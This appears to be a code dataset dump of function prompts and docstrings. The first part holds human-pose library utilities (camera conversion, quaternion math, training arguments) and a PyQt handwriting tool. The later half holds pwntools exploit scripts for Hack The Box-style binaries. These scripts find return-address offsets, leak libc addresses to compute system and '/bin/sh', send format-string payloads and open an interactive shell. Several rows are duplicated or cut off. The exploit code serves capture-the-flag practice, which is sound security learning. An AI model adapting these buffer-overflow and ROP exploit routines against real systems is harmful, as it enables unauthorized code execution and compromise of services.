id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
14,431 | import numpy as np
import torch
from einops.einops import rearrange
from torch.nn import functional as F
The provided code snippet includes necessary dependencies for implementing the `cam_crop2full` function. Write a Python function `def cam_crop2full(crop_cam, center, scale, full_img_shape, focal_length)` to solve the following problem:
convert the camera parameters from the crop camera to the full camera. :param crop_cam: shape=(N, 3) weak perspective camera in cropped img coordinates (s, tx, ty) :param center: shape=(N, 2) bbox coordinates (c_x, c_y) :param scale: shape=(N, 1) square bbox resolution (b / 200) :param full_img_shape: shape=(N, 2) original image height and width :param focal_length: shape=(N,) :return:
Here is the function:
def cam_crop2full(crop_cam, center, scale, full_img_shape, focal_length):
"""convert the camera parameters from the crop camera to the full camera.
:param crop_cam: shape=(N, 3) weak perspective camera in cropped
img coordinates (s, tx, ty)
:param center: shape=(N, 2) bbox coordinates (c_x, c_y)
:param scale: shape=(N, 1) square bbox resolution (b / 200)
:param full_img_shape: shape=(N, 2) original image height and width
:param focal_length: shape=(N,)
:return:
"""
img_h, img_w = full_img_shape[:, 0], full_img_shape[:, 1]
cx, cy, b = center[:, 0], center[:, 1], scale
bs = b * crop_cam[:, 0] + 1e-9
tz = 2 * focal_length / bs
tx = (2 * (cx - img_w / 2.) / bs) + crop_cam[:, 1]
ty = (2 * (cy - img_h / 2.) / bs) + crop_cam[:, 2]
full_cam = torch.stack([tx, ty, tz], dim=-1)
return full_cam | convert the camera parameters from the crop camera to the full camera. :param crop_cam: shape=(N, 3) weak perspective camera in cropped img coordinates (s, tx, ty) :param center: shape=(N, 2) bbox coordinates (c_x, c_y) :param scale: shape=(N, 1) square bbox resolution (b / 200) :param full_img_shape: shape=(N, 2) original image height and width :param focal_length: shape=(N,) :return: |
14,432 | import numpy as np
import torch
from einops.einops import rearrange
from torch.nn import functional as F
def quat_to_rotmat(quat):
"""Convert quaternion coefficients to rotation matrix.
Args:
quat: size = [B, 4] 4 <===>(w, x, y, z)
Returns:
Rotation matrix corresponding to the quaternion -- size = [B, 3, 3]
"""
norm_quat = quat
norm_quat = norm_quat / norm_quat.norm(p=2, dim=1, keepdim=True)
w = norm_quat[:, 0]
x = norm_quat[:, 1]
y = norm_quat[:, 2]
z = norm_quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w * x, w * y, w * z
xy, xz, yz = x * y, x * z, y * z
rotMat = torch.stack([
w2 + x2 - y2 - z2, 2 * xy - 2 * wz, 2 * wy + 2 * xz, 2 * wz + 2 * xy,
w2 - x2 + y2 - z2, 2 * yz - 2 * wx, 2 * xz - 2 * wy, 2 * wx + 2 * yz,
w2 - x2 - y2 + z2
],
dim=1).view(B, 3, 3)
return rotMat
def quaternion_to_angle_axis(quaternion: torch.Tensor) -> torch.Tensor:
"""
This function is borrowed from https://github.com/kornia/kornia
Convert quaternion vector to angle axis of rotation.
Adapted from ceres C++ library: ceres-solver/include/ceres/rotation.h
Args:
quaternion (torch.Tensor): tensor with quaternions.
Return:
torch.Tensor: tensor with angle axis of rotation.
Shape:
- Input: :math:`(*, 4)` where `*` means, any number of dimensions
- Output: :math:`(*, 3)`
Example:
>>> quaternion = torch.rand(2, 4) # Nx4
>>> angle_axis = tgm.quaternion_to_angle_axis(quaternion) # Nx3
"""
if not torch.is_tensor(quaternion):
raise TypeError('Input type is not a torch.Tensor. Got {}'.format(
type(quaternion)))
if not quaternion.shape[-1] == 4:
raise ValueError(
'Input must be a tensor of shape Nx4 or 4. Got {}'.format(
quaternion.shape))
# unpack input and compute conversion
q1: torch.Tensor = quaternion[..., 1]
q2: torch.Tensor = quaternion[..., 2]
q3: torch.Tensor = quaternion[..., 3]
sin_squared_theta: torch.Tensor = q1 * q1 + q2 * q2 + q3 * q3
sin_theta: torch.Tensor = torch.sqrt(sin_squared_theta)
cos_theta: torch.Tensor = quaternion[..., 0]
two_theta: torch.Tensor = 2.0 * torch.where(
cos_theta < 0.0, torch.atan2(-sin_theta, -cos_theta),
torch.atan2(sin_theta, cos_theta))
k_pos: torch.Tensor = two_theta / sin_theta
k_neg: torch.Tensor = 2.0 * torch.ones_like(sin_theta)
k: torch.Tensor = torch.where(sin_squared_theta > 0.0, k_pos, k_neg)
angle_axis: torch.Tensor = torch.zeros_like(quaternion)[..., :3]
angle_axis[..., 0] += q1 * k
angle_axis[..., 1] += q2 * k
angle_axis[..., 2] += q3 * k
return angle_axis
def rotation_matrix_to_quaternion(rotation_matrix, eps=1e-6):
"""
This function is borrowed from https://github.com/kornia/kornia
Convert 3x4 rotation matrix to 4d quaternion vector
This algorithm is based on algorithm described in
https://github.com/KieranWynn/pyquaternion/blob/master/pyquaternion/quaternion.py#L201
Args:
rotation_matrix (Tensor): the rotation matrix to convert.
Return:
Tensor: the rotation in quaternion
Shape:
- Input: :math:`(N, 3, 4)`
- Output: :math:`(N, 4)`
Example:
>>> input = torch.rand(4, 3, 4) # Nx3x4
>>> output = tgm.rotation_matrix_to_quaternion(input) # Nx4
"""
if not torch.is_tensor(rotation_matrix):
raise TypeError('Input type is not a torch.Tensor. Got {}'.format(
type(rotation_matrix)))
if len(rotation_matrix.shape) > 3:
raise ValueError(
'Input size must be a three dimensional tensor. Got {}'.format(
rotation_matrix.shape))
# if not rotation_matrix.shape[-2:] == (3, 4):
# raise ValueError(
# 'Input size must be a N x 3 x 4 tensor. Got {}'.format(
# rotation_matrix.shape))
rmat_t = torch.transpose(rotation_matrix, 1, 2)
mask_d2 = rmat_t[:, 2, 2] < eps
mask_d0_d1 = rmat_t[:, 0, 0] > rmat_t[:, 1, 1]
mask_d0_nd1 = rmat_t[:, 0, 0] < -rmat_t[:, 1, 1]
t0 = 1 + rmat_t[:, 0, 0] - rmat_t[:, 1, 1] - rmat_t[:, 2, 2]
q0 = torch.stack([
rmat_t[:, 1, 2] - rmat_t[:, 2, 1], t0,
rmat_t[:, 0, 1] + rmat_t[:, 1, 0], rmat_t[:, 2, 0] + rmat_t[:, 0, 2]
], -1)
t0_rep = t0.repeat(4, 1).t()
t1 = 1 - rmat_t[:, 0, 0] + rmat_t[:, 1, 1] - rmat_t[:, 2, 2]
q1 = torch.stack([
rmat_t[:, 2, 0] - rmat_t[:, 0, 2], rmat_t[:, 0, 1] + rmat_t[:, 1, 0],
t1, rmat_t[:, 1, 2] + rmat_t[:, 2, 1]
], -1)
t1_rep = t1.repeat(4, 1).t()
t2 = 1 - rmat_t[:, 0, 0] - rmat_t[:, 1, 1] + rmat_t[:, 2, 2]
q2 = torch.stack([
rmat_t[:, 0, 1] - rmat_t[:, 1, 0], rmat_t[:, 2, 0] + rmat_t[:, 0, 2],
rmat_t[:, 1, 2] + rmat_t[:, 2, 1], t2
], -1)
t2_rep = t2.repeat(4, 1).t()
t3 = 1 + rmat_t[:, 0, 0] + rmat_t[:, 1, 1] + rmat_t[:, 2, 2]
q3 = torch.stack([
t3, rmat_t[:, 1, 2] - rmat_t[:, 2, 1],
rmat_t[:, 2, 0] - rmat_t[:, 0, 2], rmat_t[:, 0, 1] - rmat_t[:, 1, 0]
], -1)
t3_rep = t3.repeat(4, 1).t()
mask_c0 = mask_d2 * mask_d0_d1
mask_c1 = mask_d2 * ~mask_d0_d1
mask_c2 = ~mask_d2 * mask_d0_nd1
mask_c3 = ~mask_d2 * ~mask_d0_nd1
mask_c0 = mask_c0.view(-1, 1).type_as(q0)
mask_c1 = mask_c1.view(-1, 1).type_as(q1)
mask_c2 = mask_c2.view(-1, 1).type_as(q2)
mask_c3 = mask_c3.view(-1, 1).type_as(q3)
q = q0 * mask_c0 + q1 * mask_c1 + q2 * mask_c2 + q3 * mask_c3
q /= torch.sqrt(t0_rep * mask_c0 + t1_rep * mask_c1 + # noqa
t2_rep * mask_c2 + t3_rep * mask_c3) # noqa
q *= 0.5
return q
def projection(pred_joints, pred_camera, iwp_mode=True):
"""Project 3D points on the image plane based on the given camera info,
Identity rotation and Weak Perspective (IWP) camera is used when
iwp_mode = True
"""
batch_size = pred_joints.shape[0]
if iwp_mode:
cam_sxy = pred_camera['cam_sxy']
pred_cam_t = torch.stack([
cam_sxy[:, 1], cam_sxy[:, 2], 2 * 5000. /
(224. * cam_sxy[:, 0] + 1e-9)
],
dim=-1)
camera_center = torch.zeros(batch_size, 2)
pred_keypoints_2d = perspective_projection(
pred_joints,
rotation=torch.eye(3).unsqueeze(0).expand(batch_size, -1, -1).to(
pred_joints.device),
translation=pred_cam_t,
focal_length=5000.,
camera_center=camera_center)
else:
raise NotImplementedError
return pred_keypoints_2d
The provided code snippet includes necessary dependencies for implementing the `compute_twist_rotation` function. Write a Python function `def compute_twist_rotation(rotation_matrix, twist_axis)` to solve the following problem:
Compute the twist component of given rotation and twist axis https://stackoverflow.com/questions/3684269/component-of-a-quaternion-rotation-around-an-axis Parameters ---------- rotation_matrix : Tensor (B, 3, 3,) The rotation to convert twist_axis : Tensor (B, 3,) The twist axis Returns ------- Tensor (B, 3, 3) The twist rotation
Here is the function:
def compute_twist_rotation(rotation_matrix, twist_axis):
'''
Compute the twist component of given rotation and twist axis
https://stackoverflow.com/questions/3684269/component-of-a-quaternion-rotation-around-an-axis
Parameters
----------
rotation_matrix : Tensor (B, 3, 3,)
The rotation to convert
twist_axis : Tensor (B, 3,)
The twist axis
Returns
-------
Tensor (B, 3, 3)
The twist rotation
'''
quaternion = rotation_matrix_to_quaternion(rotation_matrix)
twist_axis = twist_axis / (
torch.norm(twist_axis, dim=1, keepdim=True) + 1e-9)
projection = torch.einsum('bi,bi->b', twist_axis,
quaternion[:, 1:]).unsqueeze(-1) * twist_axis
twist_quaternion = torch.cat([quaternion[:, 0:1], projection], dim=1)
twist_quaternion = twist_quaternion / (
torch.norm(twist_quaternion, dim=1, keepdim=True) + 1e-9)
twist_rotation = quat_to_rotmat(twist_quaternion)
twist_aa = quaternion_to_angle_axis(twist_quaternion)
twist_angle = torch.sum(
twist_aa, dim=1, keepdim=True) / torch.sum(
twist_axis, dim=1, keepdim=True)
return twist_rotation, twist_angle | Compute the twist component of given rotation and twist axis https://stackoverflow.com/questions/3684269/component-of-a-quaternion-rotation-around-an-axis Parameters ---------- rotation_matrix : Tensor (B, 3, 3,) The rotation to convert twist_axis : Tensor (B, 3,) The twist axis Returns ------- Tensor (B, 3, 3) The twist rotation |
14,433 | import argparse
import copy
import os
import os.path as osp
import time
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmhuman3d import __version__
from mmhuman3d.apis import set_random_seed, train_model
from mmhuman3d.data.datasets import build_dataset
from mmhuman3d.models.architectures.builder import build_architecture
from mmhuman3d.utils.collect_env import collect_env
from mmhuman3d.utils.logger import get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a model')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument('--device', help='device used for training')
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options', nargs='+', action=DictAction, help='arguments in dict')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args | null |
14,434 | import argparse
import os
import time
import mmcv
import numpy as np
import torch
from mmhuman3d.core.conventions.keypoints_mapping import convert_kps
from mmhuman3d.core.evaluation import keypoint_mpjpe
from mmhuman3d.core.visualization.visualize_smpl import visualize_smpl_pose
from mmhuman3d.data.data_structures.human_data import HumanData
from mmhuman3d.models.registrants.builder import build_registrant
def parse_args():
parser = argparse.ArgumentParser(description='mmhuman3d smplify tool')
parser.add_argument(
'--input',
help=('input file path.'
'Input shape should be [N, J, D] or [N, M, J, D],'
' where N is the sequence length, M is the number of persons,'
' J is the number of joints and D is the dimension.'))
parser.add_argument(
'--input_type',
choices=['keypoints2d', 'keypoints3d'],
default='keypoints3d',
help='input type')
parser.add_argument(
'--J_regressor',
type=str,
default=None,
help='the path of the J_regressor')
parser.add_argument(
'--keypoint_type',
default='human_data',
help='the source type of input keypoints')
parser.add_argument('--config', help='smplify config file path')
parser.add_argument('--body_model_dir', help='body models file path')
parser.add_argument('--batch_size', type=int, default=None)
parser.add_argument('--num_betas', type=int, default=10)
parser.add_argument('--num_epochs', type=int, default=1)
parser.add_argument(
'--use_one_betas_per_video',
action='store_true',
help='use one betas to keep shape consistent through a video')
parser.add_argument(
'--device',
choices=['cpu', 'cuda'],
default='cuda',
help='device used for smplify')
parser.add_argument(
'--gender',
choices=['neutral', 'male', 'female'],
default='neutral',
help='gender of SMPL model')
parser.add_argument('--output', help='output result file')
parser.add_argument(
'--show_path', help='directory to save rendered images or video')
parser.add_argument(
'--overwrite',
action='store_true',
help='Whether to overwrite if there is already a result file.')
args = parser.parse_args()
return args | null |
14,435 | import argparse
import os
from mmhuman3d.data.data_converters import build_data_converter
DATASET_CONFIGS = dict(
agora=dict(
type='AgoraConverter', modes=['train', 'validation'], fit='smplx'),
amass=dict(type='AmassConverter', prefix='AMASS_file'),
coco=dict(type='CocoConverter'),
coco_wholebody=dict(
type='CocoWholebodyConverter', modes=['train', 'val'], prefix='coco'),
crowdpose=dict(
type='CrowdposeConverter', modes=['train', 'val', 'test', 'trainval']),
pw3d=dict(type='Pw3dConverter', modes=['train', 'test']),
mpii=dict(type='MpiiConverter'),
h36m_p1=dict(
type='H36mConverter',
modes=['train', 'valid'],
protocol=1,
mosh_dir='data/datasets/h36m_mosh',
prefix='h36m'),
h36m_p2=dict(
type='H36mConverter', modes=['valid'], protocol=2, prefix='h36m'),
mpi_inf_3dhp=dict(type='MpiInf3dhpConverter', modes=['train', 'test']),
penn_action=dict(type='PennActionConverter'),
lsp_original=dict(type='LspConverter', modes=['train'], prefix='lsp'),
lsp_dataset=dict(type='LspConverter', modes=['test']),
lsp_extended=dict(type='LspExtendedConverter', prefix='lspet'),
up3d=dict(
type='Up3dConverter', modes=['trainval', 'test'], prefix='up-3d'),
posetrack=dict(type='PosetrackConverter', modes=['train', 'val']),
instavariety_vibe=dict(type='InstaVibeConverter', prefix='vibe_data'),
eft=dict(
type='EftConverter', modes=['coco_all', 'coco_part', 'mpii', 'lspet']),
coco_hybrik=dict(type='CocoHybrIKConverter', prefix='coco/train_2017'),
pw3d_hybrik=dict(type='Pw3dHybrIKConverter', prefix='hybrik_data'),
h36m_hybrik=dict(
type='H36mHybrIKConverter',
modes=['train', 'test'],
prefix='hybrik_data'),
mpi_inf_3dhp_hybrik=dict(
type='MpiInf3dhpHybrIKConverter',
modes=['train', 'test'],
prefix='hybrik_data'),
surreal=dict(
type='SurrealConverter', modes=['train', 'val', 'test'], run=0),
spin=dict(
type='SpinConverter',
modes=['coco_2014', 'lsp', 'mpii', 'mpi_inf_3dhp', 'lspet'],
prefix='spin_data'),
vibe=dict(
type='VibeConverter',
modes=['pw3d', 'mpi_inf_3dhp'],
pretrained_ckpt='data/checkpoints/spin.pth',
prefix='vibe_data'),
gta_human=dict(type='GTAHumanConverter', prefix='gta_human'),
humman=dict(
type='HuMManConverter', modes=['train', 'test'], prefix='humman'),
cliff=dict(type='CliffConverter', modes=['coco', 'mpii']))
def parse_args():
parser = argparse.ArgumentParser(description='Convert datasets')
parser.add_argument(
'--root_path',
type=str,
required=True,
help='the root path of original data')
parser.add_argument(
'--output_path',
type=str,
required=True,
help='the path to store the preprocessed npz files')
parser.add_argument(
'--datasets',
type=str,
nargs='+',
required=True,
default=[],
help=f'Supported datasets: {list(DATASET_CONFIGS.keys())}')
parser.add_argument(
'--enable_multi_human_data',
type=bool,
default=False,
help='Whether to generate a multi-human data')
args = parser.parse_args()
return args | null |
14,436 | import argparse
import subprocess
from datetime import date
import torch
def parse_args():
parser = argparse.ArgumentParser(
description='Process a checkpoint to be published')
parser.add_argument('in_file', help='input checkpoint filename')
parser.add_argument('out_file', help='output checkpoint filename')
args = parser.parse_args()
return args | null |
14,437 | import argparse
import subprocess
from datetime import date
import torch
def process_checkpoint(in_file, out_file):
checkpoint = torch.load(in_file, map_location='cpu')
# remove optimizer for smaller file size
if 'optimizer' in checkpoint:
del checkpoint['optimizer']
# if it is necessary to remove some sensitive data in checkpoint['meta'],
# add the code here.
torch.save(checkpoint, out_file)
sha = subprocess.check_output(['sha256sum', out_file]).decode()
if out_file.endswith('.pth'):
out_file_name = out_file[:-4]
else:
out_file_name = out_file
date_now = date.today().strftime('%Y%m%d')
final_file = out_file_name + f'-{sha[:8]}_{date_now}.pth'
subprocess.Popen(['mv', out_file, final_file]) | null |
14,438 | import sys
import os
from PyQt6.QtCore import pyqtSignal
from PyQt6.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PIL import Image, ImageFont, ImageQt
from handright import Template, handwrite
from threading import Thread
from ui import *
def getfile():
q = QFileDialog.getOpenFileName()
return q[0] | null |
14,439 | import sys
import os
from PyQt6.QtCore import pyqtSignal
from PyQt6.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox
from PIL import Image, ImageFont, ImageQt
from handright import Template, handwrite
from threading import Thread
from ui import *
def savefile():
q = QFileDialog.getSaveFileName()
return q[0] | null |
14,440 | import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep
def uniquify(path, sep = ''):
def name_sequence():
count = IT.count()
yield ''
while True:
yield '{s}_{n:d}'.format(s = sep, n = next(count))
orig = tempfile._name_sequence
with tempfile._once_lock:
tempfile._name_sequence = name_sequence()
path = os.path.normpath(path)
dirname, basename = os.path.split(path)
filename, ext = os.path.splitext(basename)
fd, filename = tempfile.mkstemp(dir = dirname, prefix = filename, suffix = ext)
os.remove(filename)
tempfile._name_sequence = orig
return filename | null |
14,441 | import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep
def shouldRun():
click.secho('Will run analysis in 1 second, press any key to cancel', fg='green')
i, o, e = select.select( [sys.stdin], [], [], 1 )
if (i):
return False
else:
return True | null |
14,442 | from pwn import *
gdbscript = '''
init-pwndbg
break main
'''.format(**locals())
exe = './shooting_star'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,443 | from pwn import *
exe = './shooting_star'
info("%#x pop_rdi", pop_rdi)
info("%#x pop_rsi_r15", pop_rsi_r15)
info("leaked got_write: %#x", got_write)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', '1')
p.sendlineafter('>>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,445 | from pwn import *
exe = './shooting_star'
info("%#x pop_rsi_r15", pop_rsi_r15)
info("leaked got_write: %#x", got_write)
info("libc_base: %#x", libc.address)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', '1')
p.sendlineafter('>>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,446 | from pwn import *
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())
exe = './blacksmith'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,447 | from pwn import *
gdbscript = '''
init-pwndbg
breakrva 0x0000131f
continue
'''.format(**locals())
exe = './batcomputer'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,448 | from pwn import *
exe = './batcomputer'
info("leaked stack_addr: %#x", stack_addr)
def find_ip(payload):
p = process(exe)
p.sendlineafter('>', '2') # Chase joker
p.sendlineafter('Enter the password:', 'b4tp@$$w0rd!') # Enter password
p.sendlineafter('Enter the navigation commands:', payload) # Cyclic pattern
p.sendlineafter('>', '420') # Enter invalid option to trigger return
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,449 | from pwn import *
gdbscript = '''
init-pwndbg
piebase
breakrva 0x1438
continue
'''.format(**locals())
exe = './nightmare'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,451 | from pwn import *
io = process(exe)
menu_option = '1'
io = start()
menu_option = '2'
menu_option = '1'
io.send('1')
io.recv()
io.sendline('2')
io.recv()
io.sendline('sh')
io.interactive()
def send_payload(payload):
io.sendlineafter('>', menu_option)
io.sendlineafter('>', payload)
io.recvuntil('> ')
return io.recvline().strip() | null |
14,452 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './vuln'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,453 | from pwn import *
exe = './vuln'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b'>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,454 | from pwn import *
gdbscript = '''
init-pwndbg
piebase 0x40c0
continue
'''.format(**locals())
exe = './pwnshop'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,455 | from pwn import *
exe = './pwnshop'
info("leaked_address: %#x", leaked_addr)
info("pie_base: %#x", elf.address)
info("got_puts: %#x", got_puts)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', '1') # Try to buy something
p.sendlineafter('Enter details:', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,457 | from pwn import *
exe = './pwnshop'
info("leaked_address: %#x", leaked_addr)
info("pie_base: %#x", elf.address)
info("got_puts: %#x", got_puts)
info("libc_base: %#x", libc.address)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', '1') # Try to buy something
p.sendlineafter('Enter details:', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,458 | from pwn import *
gdbscript = '''
init-pwndbg
breakrva 0x00001368
continue
'''.format(**locals())
exe = './optimistic'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,459 | from pwn import *
exe = './optimistic'
info("leaked stack_addr: %#x", stack_addr)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(':', 'y') # Yes, we want to enrol
p.sendlineafter('Email:', '420') # Provide email address - only reads 8 bytes
p.sendlineafter('Age:', '1337') # Provide age - also reads 8 bytes
p.sendlineafter('Length of name:', '-1') # Provide length of name - needs to be <= 64
p.sendlineafter('Name:', payload) # Provide name (needs to be within length previously specified)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,460 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './format'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,462 | from pwn import *
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())
exe = './ropme'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,463 | from pwn import *
exe = './ropme'
info("leaked got_puts: %#x", got_puts)
info("libc_base: %#x", libc.address)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('?', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,465 | from pwn import *
exe = './ropme'
info("leaked got_puts: %#x", got_puts)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('?', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,466 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './htb-console'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,467 | from pwn import *
exe = './htb-console'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>>', 'flag')
p.sendlineafter('Enter flag:', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,470 | from pwn import *
exe = './reg'
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('Enter your name :', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
eip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,471 | from pwn import *
import codecs
gdbscript = '''
init-pwndbg
break *0x401168
continue
'''.format(**locals())
exe = './ropmev2'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,472 | from pwn import *
import codecs
def rot13(s): return codecs.getencoder("rot-13")(s)[0]
exe = './ropmev2'
info("leaked_address: %#x", leaked_addr)
def find_ip(payload):
